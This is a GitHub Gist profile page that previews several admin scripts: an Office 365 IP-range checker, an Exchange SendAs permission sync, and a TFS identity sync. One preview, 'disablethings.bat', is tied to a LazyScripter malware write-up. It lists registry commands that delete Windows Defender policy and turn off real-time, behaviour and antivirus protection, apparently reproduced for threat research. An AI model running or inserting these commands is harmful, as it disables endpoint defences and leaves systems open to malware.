Skip to content

Instantly share code, notes, and snippets.

Avatar

Fabian Bader f-bader

View GitHub Profile
@f-bader
f-bader / Test-IsO365IpAddress.ps1
Created Aug 23, 2019
Test if a IP address is part of the Office 365 endpoints
View Test-IsO365IpAddress.ps1
[CmdletBinding()]
param (
# IP Address to check against Office 365 Range
[Parameter(Mandatory = $true,
ValueFromPipeline = $true,
Position = 0)]
$IPAddress,
# Port to check
[Parameter(Mandatory = $false,
View SyncExchangeOnPremSendAsPermissions.ps1
<#
This script syncs SendAs permissions from Exchange on-Prem to Exchange Online to avoid a misconfigured hybrid environment
Uses Azure Automation for scheduling and safely storing the on-Prem credentials as well as the authentication certificate for Exchange Online
Prerequisites
* Azure Automation Account
* Hybrid Worker
* Setup App-only authentication (https://docs.microsoft.com/en-us/powershell/exchange/app-only-auth-powershell-v2)
* Install private certificate as exportable to Azure Automation Account as 'Exchange Hybrid Automation'
* Store OnPrem Exchange credentials in Azure Automation Account as 'Exchange onPrem'
View disablethings.bat
### Related to MalwareBytes LazyScripter https://blog.malwarebytes.com/malwarebytes-news/2021/02/lazyscripter-from-empire-to-double-rat
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtime
@f-bader
f-bader / Sync-TfsIdentity.ps1
Last active Mar 17, 2021 — forked from jstangroome/Sync-TfsIdentity.ps1
Force TFS 2018 to synchronize Active Directory group memberships
View Sync-TfsIdentity.ps1
[CmdletBinding()]
param (
[Parameter(Mandatory=$true, Position=0)]
[uri]
$ServerUri
)
$ErrorActionPreference = 'Stop'
Set-StrictMode -Version Latest